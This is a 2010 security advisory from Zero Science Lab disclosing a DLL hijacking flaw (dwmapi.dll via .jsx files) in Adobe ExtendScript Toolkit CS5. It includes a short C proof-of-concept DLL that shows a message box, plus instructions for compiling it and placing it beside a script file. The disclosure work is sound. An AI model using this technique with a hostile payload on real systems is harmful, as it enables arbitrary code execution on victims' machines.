Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

2010-08-26T00:00:00
ID ZSL-2010-4952
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-08-26T00:00:00

Description

Title: Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4952
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility included with Adobe® Creative Suite CS5 and other Adobe applications. The ESTK is used for creating, editing, and debugging JavaScript to be used for scripting Adobe applications.

Description

Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extension is .jsx thru dwmapi.dll library.

Vendor

Adobe Systems Inc. - <http://www.adobe.com>

Affected Version

CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

adobeest_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/exploits/14785>
[2] <http://packetstormsecurity.org/filedesc/adobeest_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8780>
[4] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[5] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[6] <http://www.vupen.com/english/advisories/2010/2213>
[7] <http://osvdb.org/show/osvdb/67550>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3155>
[9] <http://www.securityfocus.com/bid/42749>

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4] and [5]
[28.08.2010] - Added reference [6] and [7]
[31.08.2010] - Added reference [8]
[13.11.2010] - Added reference [9]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            /*

 Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

 Vendor: Adobe Systems Inc.
 Product Web Page: http://www.adobe.com
 Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37

 Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
 included with Adobe® Creative Suite CS5 and other Adobe applications.
 The ESTK is used for creating, editing, and debugging JavaScript to be
 used for scripting Adobe applications.

 Desc: Adobe ExtendScript Toolkit CS5 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extension is .jsx thru dwmapi.dll library.

 ----
 gcc -shared -o dwmapi.dll adobeest.c

 Compile and rename to dwmapi.dll, create a file test.jsx and put both files
 in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}